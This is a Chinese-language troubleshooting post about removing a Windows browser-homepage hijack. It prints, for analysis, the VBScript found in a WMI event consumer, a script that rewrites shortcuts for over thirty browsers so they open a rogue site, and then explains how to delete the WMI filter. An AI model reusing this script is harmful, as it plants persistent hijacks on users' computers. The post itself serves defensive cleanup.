先放一个知乎帖子: https://www.zhihu.com/question/21883209
我就只放几个有效解决办法了,具体的可以看上边那个帖子
方案一: 删掉桌面上的chrome图标,打开安装文件夹找到chrome.exe,随便改成什么名字.exe,重新发送到桌面快捷方式,让恶意程序找不到chrome.exe
但其实上面的办法都治标不治本,并且千万不要下载什么 这管家那管家的,以毒攻毒吗
补充一种推荐的方案:
参考的这位大哥 - https://jing-luo.github.io/2017/03/DefeatYourBrowser/(别告我侵权)
以下内容基本照搬
主页被劫持的原理是一段通过WMI发起的定时自动运行脚本,WMI(Windows Management Instrumentation)可以理解成Windows系统后台运行的一个事件管理器。为查看WMI事件,先去下载WMITools并安装:WMI工具 WMI工具。
之后打开WMI Event Viewer:
点击左上角的笔的图标(Register For Events),在弹出的Connect to namespace的框直接点OK,Login的页面也直接点OK。点开左侧栏的EventFilter,再点击下级目录的项目:
在右侧栏右键点击ActiveScriptEventConsumer,并通过view instant properties查看属性:
在Script Text那一栏我们可以看到这段脚本:
On Error Resume Next
Const link= "http://hao.qquu8.com/?m=yx&r=j"Const link360= "http://hao.qquu8.com/?m=yx&r=j&s=3"browsers= "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"lnkpaths= "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\sjtul\Desktop,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\sjtul\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"browsersArr= split(browsers,",")
Set oDic= CreateObject("scripting.dictionary")
For Each browser In browsersArr
oDic.Add LCase(browser), browser
Next
lnkpathsArr= split(lnkpaths,",")
Set oFolders= CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
oFolders.Add lnkpath, lnkpath
Next
Set fso= CreateObject("Scripting.Filesystemobject")
Set WshShell= CreateObject("Wscript.Shell")
For Each oFolder In oFolders
If fso.FolderExists(oFolder) Then
For Each file In fso.GetFolder(oFolder).Files
If LCase(fso.GetExtensionName(file.Path))= "lnk"Then
Set oShellLink=WshShell.CreateShortcut(file.Path)
path=oShellLink.TargetPath
name= fso.GetBaseName(path) & "." &fso.GetExtensionName(path)
If oDic.Exists(LCase(name)) Then
If LCase(name)= LCase("360se.exe") Then
oDicShellLink.Arguments=link360
Else
oShellLink.Arguments=link
End If
If file.Attributes And1Then
fsoile.Attributes= file.Attributes - 1End If
oShellLink.Save
End If
End If
Next
End If
Next
可以看到这是一段VBScript代码,攻击目标涵盖了包括Chrome、360、Firefox、搜狗等30余种常见的浏览器。脚本以浏览器的安装地址为切入点,创建WshShell对象,进而生成植入了流氓网站的快捷方式。360浏览器有限定主页格式,于是这段脚本还特地修饰了流氓网站的链接。
解决办法就是清除这段脚本:
直接在WMI Event Viewer中将_EventFilter.Name=”VBScriptKLive_filter”右键删掉会被系统拒绝掉
需要去WMI Event Viewer的安装位置,右键以管理员方式运行exe文件才能删掉。
(
之后还要把各个快捷方式都改回不带流氓网站的版本,包括桌面上的、开始菜单里的以及快速访问栏里的快捷方式,其中开始菜单里的快捷方式要去C:\ProgramData\Microsoft\Windows\Start Menu\Programs里改掉。
)